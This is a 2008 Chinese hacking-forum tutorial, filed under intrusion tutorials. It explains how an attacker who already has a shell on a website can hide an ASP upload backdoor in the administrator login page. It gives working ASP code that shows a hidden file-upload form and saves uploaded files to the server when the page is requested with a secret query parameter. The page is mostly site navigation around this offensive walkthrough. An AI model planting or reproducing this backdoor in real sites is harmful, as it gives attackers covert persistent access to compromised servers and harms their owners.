奥运倒计时:
设为首页
加入收藏
论坛登陆 用户名:
密码:
首页
新闻资讯
文章中心
黑客资源
黑客点睛
安全防护
软件下载
动画教程
商城中心
技术问答
论坛社区
文章
下载
图片
文章
|
电脑知识
|
网络知识
|
菜鸟入门
|
入侵教程
|
黑客攻防
|
黑客编程
|
原创精华
|
黑客人物
|
黑客技术
|
提权技术
|
跨站技术
|
渗透技术
|
鸽子专题
|
您现在的位置:
太平洋安全网
>>
文章
>>
入侵教程
>> 正文
在管理员后台隐藏ASP后门
作者:
放弃
文章来源:
网上收集
点击数: 更新时间:2008-4-5
今天说的是在管理员的后台登陆界面隐藏我们的后门,这是相对比较
安全
的,因为管理员的入口不是
经常换的,只要他的登陆界面在,我们的后门就在!
1.从我们的SHELL上找到管理员的入口页面
2.编辑它 在最后面写上一段代码
<%if request.QueryString("action")="comeon" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=subm
IT
></form>
<%end if%> 3.那我们要怎么去找我们的后门呢?表面看是没什么区别的 这就是我们隐藏的秘诀所在
login.asp+?action=comeon
出现了我们的上传页面!
文章录入:放弃 责任编辑:放弃
上一篇文章:
网站中SQL注入脚本漏洞的挖掘与防护
下一篇文章:
黑客示范如何攻入Windows Vista系统
【
发表评论
】【
加入收藏
】【
告诉好友
】【
打印此文
】【
关闭窗口
】
推荐
文章
利用系统漏洞轻轻松松绕过你的验证码
在网页里挂上代码的技巧(图)
推荐:用存储过程一样搞定服务器
完整XSS wrom入侵流程
意外拿下jsp服务器
高手解析如何入侵3389
我是如何黑掉PacketStorm论坛的
看紧你的3306端口,一次通过mysql的检测
热门
文章
推荐:用存储过程一样搞定服务器
浅析浪人文章系统V2.3
扔掉工具,让你飞速学会手工注入
本站
推荐
关于我们
|
联系方法
|
招聘信息
|
加入会员
|
诚征代理
|
广告服务
|
欢迎投稿
|
站长信箱
|
友情链接
|
网站地图
24小时客服:0374-7126138 技术支持:0374-7126138 投诉电话:0374-7967536
客服QQ:883039 售后QQ:827520 技术QQ:78305152 投稿-商业:576880739
Copyright 太平洋科技 2003-2007 版权所有 All Rights Reserved
许可证号:豫ICP备07005385号